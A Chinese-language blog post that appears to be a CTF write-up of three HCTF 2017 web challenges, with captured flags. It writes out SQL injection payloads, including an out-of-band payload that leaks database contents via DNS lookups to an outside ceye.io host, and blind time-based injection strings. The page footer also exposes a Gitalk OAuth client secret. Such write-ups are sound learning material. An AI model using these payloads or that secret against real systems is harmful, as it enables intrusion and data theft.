<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="64x64" href="/images/favicon-48x48-next.png">
  <link rel="icon" type="image/png" sizes="48x48" href="/images/favicon-48x48-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Mist","version":"7.7.2","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="0x00 poker2这两天真的是沉迷游戏，不能自拔，刚开始进入游戏的时候，发现同目录有flag.php，要求游戏升到100级，就可以得到flag，那就是刷级了，结果一注册，发现送了成长礼包（后来才发现原来其他人没有），直接飙到90级，占据全服第一的位置一个上午。这题就是抓包重复刷怪就好了，只知道圣诞小屋经验高。这里直接贴脚本了">
<meta property="og:type" content="article">
<meta property="og:title" content="两天做了HCTF的最简单的题">
<meta property="og:url" content="http://yoursite.com/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/index.html">
<meta property="og:site_name" content="Cyc1e&#39;s Blog">
<meta property="og:description" content="0x00 poker2这两天真的是沉迷游戏，不能自拔，刚开始进入游戏的时候，发现同目录有flag.php，要求游戏升到100级，就可以得到flag，那就是刷级了，结果一注册，发现送了成长礼包（后来才发现原来其他人没有），直接飙到90级，占据全服第一的位置一个上午。这题就是抓包重复刷怪就好了，只知道圣诞小屋经验高。这里直接贴脚本了">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yoursite.com/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/8418106-2249f408b45e1c33.png">
<meta property="og:image" content="http://yoursite.com/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/8418106-3cf59e70e00511d7.png">
<meta property="og:image" content="http://yoursite.com/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/8418106-e8fd0904e57cdc6f.png">
<meta property="og:image" content="http://yoursite.com/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/8418106-dcb4fcdd43d1eead.png">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8418106-401387e4b93a4c11.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="article:published_time" content="2017-11-12T13:15:33.000Z">
<meta property="article:modified_time" content="2020-03-05T10:13:32.829Z">
<meta property="article:author" content="Cyc1e">
<meta property="article:tag" content="逻辑">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/8418106-2249f408b45e1c33.png">

<link rel="canonical" href="http://yoursite.com/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true
  };
</script>

  <title>两天做了HCTF的最简单的题 | Cyc1e's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Cyc1e's Blog" type="application/atom+xml">
</head>


<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Cyc1e's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/header.jpg">
      <meta itemprop="name" content="Cyc1e">
      <meta itemprop="description" content="潜心专研、与世无争😄">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cyc1e's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          两天做了HCTF的最简单的题
        </h1>

        <div class="post-meta">
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2017-11-12 21:15:33" itemprop="dateCreated datePublished" datetime="2017-11-12T21:15:33+08:00">2017-11-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-03-05 18:13:32" itemprop="dateModified" datetime="2020-03-05T18:13:32+08:00">2020-03-05</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Cyc1e%E7%9A%84CTF%E4%B9%8B%E8%B7%AF/" itemprop="url" rel="index"><span itemprop="name">Cyc1e的CTF之路</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>1.5k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>1 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="0x00-poker2"><a href="#0x00-poker2" class="headerlink" title="0x00 poker2"></a>0x00 poker2</h3><p>这两天真的是沉迷游戏，不能自拔，刚开始进入游戏的时候，发现同目录有flag.php，要求游戏升到100级，就可以得到flag，那就是刷级了，结果一注册，发现送了成长礼包（后来才发现原来其他人没有），直接飙到90级，占据全服第一的位置一个上午。这题就是抓包重复刷怪就好了，只知道圣诞小屋经验高。这里直接贴脚本了</p>
<p><img src="/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/8418106-2249f408b45e1c33.png" alt></p>
<p>简单的刷分脚本                                        </p>
<p>到了100级后到flag.php就直接得到flag：hctf{Go0dLuck_toGetTheFl3g__from_game}</p>
<p><strong>boring website</strong></p>
<p>扫描发现有<a href="http://www.zip，里面有index.php的源码" target="_blank" rel="noopener">www.zip，里面有index.php的源码</a></p>
<p><img src="/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/8418106-3cf59e70e00511d7.png" alt>                                   </p>
<p>注入点很明显，就是在参数id那，数据库密码 ‘oob’ 提示这道题是MySQL Out-of-Band攻击，再加上注释的 //link server: On  linkname:mysql，目标数据库是SQL Server的，所以这里要用到OpenQuery表达式：OPENQUERY (  linked_server ,’query’ )，由于过滤了敏感字符，没法得到回显，主要参考文章：</p>
<p><a href="http://bobao.360.cn/learning/detail/3458.html，发现可以利用DNS解析提取数据，例如：select" target="_blank" rel="noopener">http://bobao.360.cn/learning/detail/3458.html，发现可以利用DNS解析提取数据，例如：select</a>  load_file(concat(‘\’,version(),’.hacker.site\a.txt’));所以构造payload：id=1; select * from OpenQuery(mysql,’SELECT LOAD_FILE(CONCAT(“\”,(select  1),”.mysql.ip.port.8cs2vs.ceye.io\abc”))’);</p>
<p>在DNS解析平台可以得到反馈数据，那么就下来就是把(select 1)改成查库，查表，查字段/内容的语句就好了,主要还是学习了oob攻击一波，这里直接贴图：</p>
<p><img src="/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/8418106-e8fd0904e57cdc6f.png" alt></p>
<p>得到flag：hctf{dn5-1og-can-take-f14g-6as84f}</p>
<h3 id="0x01-poker-poker"><a href="#0x01-poker-poker" class="headerlink" title="0x01 poker-poker"></a>0x01 poker-poker</h3><p>打开发现和level 2里的poker2是一样的，那就是一道题两个flag，在做level 2  的时候，就尝试过很多方法，抓包的时候发现带有很多参数，所以把包后甩sqlmap里跑了一下，在注册处的包有报存在注入，但是sqlmap都没法跑出来，带着测试一波的心理开始手动测试，发现username参数可以进行时间盲注，没有过滤，直接构造payload：</p>
<p>?bc=2&amp;bname=easdasd&amp;head=6&amp;pass=&amp;sex=2&amp;username= ’ and if( (ascii(substr((select database()),1))&gt;97),sleep(5)1)–+</p>
<p>发现不仅可以时间，还可以直接判断返回值来注，可以构造payload：</p>
<p>?bc=2&amp;bname=easdasd&amp;head=6&amp;pass=&amp;sex=2&amp;username=11111 ’ and if( (ascii(substr((select database()),1))&gt;97),0,1)–+  进行注入（这样写脚本方便点）</p>
<p>这里必须补充写下，直接查库是pm_hctf，查到第一个表是PasswordProtection</p>
<p>看到题目是的pspt，心里有点小高兴，结果花了好几个小时，把pm_hctf库下100多个表名都看了一遍，发现没有和flag有关的啊，最后重新查了下其他库，有个hctf，flag2表，真的是一把幸酸泪啊，直接贴脚本：</p>
<p><img src="/2017/11/12/%E4%B8%A4%E5%A4%A9%E5%81%9A%E4%BA%86HCTF%E7%9A%84%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98/8418106-dcb4fcdd43d1eead.png" alt>                                      </p>
<p><img src="https://upload-images.jianshu.io/upload_images/8418106-401387e4b93a4c11.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>得到flag：hctf{y3u_G0t_tHe__poker_game}</p>

    </div>

    
    
    
        

  <div class="followme">
    <p>欢迎关注我的其它发布渠道</p>
    <div class="social-list">
            <div class="social-item">
              <a target="_blank" class="social-link" href="/atom.xml">
                <span class="icon">
                  <i class="fa fa-rss"></i>
                </span>
                <span class="label">RSS</span>
              </a>
            </div>
            <div class="social-item">
              <a target="_blank" class="social-link" href="https://www.jianshu.com/u/9c3ca1ca4784">
                <span class="icon">
                  <i class="fa fa-heartbeat"></i>
                </span>
                <span class="label">简书</span>
              </a>
            </div>
    </div>
  </div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/%E9%80%BB%E8%BE%91/" rel="tag"><i class="fa fa-tag"></i> 逻辑</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2017/11/20/%E4%B8%80%E9%81%93%E9%A2%98%E7%9B%AE%E5%BC%95%E5%8F%91%E7%9A%84MySQL-Out-of-Band%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="next" title="一道题目引发的MySQL-Out-of-Band学习笔记">
      一道题目引发的MySQL-Out-of-Band学习笔记 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-poker2"><span class="nav-number">1.</span> <span class="nav-text">0x00 poker2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-poker-poker"><span class="nav-number">2.</span> <span class="nav-text">0x01 poker-poker</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Cyc1e"
      src="/images/header.jpg">
  <p class="site-author-name" itemprop="name">Cyc1e</p>
  <div class="site-description" itemprop="description">潜心专研、与世无争😄</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">30</span>
          <span class="site-state-item-name">文章</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">30</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Cyc1eC" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Cyc1eC" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.jianshu.com/u/9c3ca1ca4784" title="简书 → https:&#x2F;&#x2F;www.jianshu.com&#x2F;u&#x2F;9c3ca1ca4784" rel="noopener" target="_blank"><i class="fa fa-fw fa-heartbeat"></i>简书</a>
      </span>
      <span class="links-of-author-item">
        <a href="/atom.xml" title="RSS → &#x2F;atom.xml"><i class="fa fa-fw fa-rss"></i>RSS</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
      <!--<script src="https://cdn.staticfile.org/jquery/3.1.1/jquery.min.js"></script>
<script>
    var div = $('.post-body');
    var toc=$('.post-toc')
    function password() {
        if(''){
            div.remove();
            toc.remove();
            $('.post-header').after(
            '<span class="description" value="password" style="font-style: normal;font-weight: bold;border: none;display: block;'+
            'width: 60%;margin: 0 auto;text-align: center;outline: none;margin-bottom: 40px;resize:none ">'+
            'Private Articles' +
            '</span>' +
            '<div class="qiang" style="height: 100px;width: 60%;margin:0 auto">' +
            '<input class="password"  type="password" autocomplete="new-password" autofocus="autofocus" value="" style="border-radius: 5px;height: 30px;border: none;display: block;border-bottom: 1px solid #ccc;' +
            'margin: 0 auto;outline: none;width:95%"/>' +
            '</div>')
            //绑定点击事件，如果是点击的.password 这个div就改变样式，如果是document中除了div之外的其他任何元素，就变回原来的样式。
            document.onclick = function (event) {
                var e = event || window.event;
                var elem = e.srcElement || e.target;

                while (elem) {
                    if (elem != document) {
                        if (elem.className == "password") {
                            //$(".password").animate({paddingTop:"30px",width:"100%",borderWidth:"2px"},300)
                            return;
                        }
                        elem = elem.parentNode;
                    } else {
                        //$(".password").animate({paddingTop:"0px",width:"95%",borderWidth:"1px"},300)
                        return;
                    }
                }
            }

            $(document).keyup(function(event){
                if(event.keyCode ==13&&$('.password').length>0){
                    //console.log($('.password').val())
                    //console.log('')
                    if ($('.password').val() == '') {
                        //恢复文章内容
                        (div).appendTo($(".post-header"))
                        //恢复目录
                        toc.appendTo($(".sidebar-inner"))
                        //删除本页面的输入密码组件
                        $(".description").remove();
                        $(".qiang").remove();
                        $(".password").remove();

                        $('img').lazyload({
                            placeholder: '/images/loading.gif',
                            effect: 'fadeIn',
                            threshold : 100,
                            failure_limit : 20,
                            skip_invisible : false
                        });
                        $(".post-block").css({opacity:1});
                        $(".post-header").css({opacity:1});
                        $(".post-body").css({opacity:1});
                        $(".pagination").css({opacity:1});
                    }else {
                        alert("Error Password")
                    }
                }
            });
        }
    }
    password();
</script>-->
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cyc1e</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">198k</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '12d6d420f80b7e657f1e',
      clientSecret: '9eefd2b08977c061960a20fe8b57f99fb62c5037',
      repo        : 'Cyc1e183.github.io',
      owner       : 'Cyc1e183',
      admin       : ['Cyc1e183'],
      id          : '92c33baa4c7b2e3d736c2d142ef38184',
        language: 'zh-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
